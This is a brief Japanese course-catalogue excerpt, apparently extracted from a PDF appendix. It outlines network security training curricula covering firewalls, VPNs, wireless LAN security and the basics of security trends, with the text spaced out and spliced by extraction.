< 別 添 資 料 Ⅱ>ネットワークセキュリティ 実 践 カリキュラム セキュアなネットワークを 構 築 するため のファイアウォール VPN および 無 線 LANセキュリティについて 習 得 します ネットワークセキュリティの 概 要 と 最 新 動 向 を 解 説 し その 対 処 方 法 に < 別 添 資 料 Ⅱ>ネットワークセキュリティ 基 礎 カリキュラム 情 報 セキュリティ 全 般 の 動 向 および 必 要 な 対 策 の 基 礎 知 識 について 習 得 し ます NISMコース 体 系 全 体 の 概 要 を 学 びます また 最 新 のセキュリティ 技 術 の 概 要 を 解 説 し 専 門 コースへの 足 がかりになる ようにします 1. ネットワークセキュリティとは

More information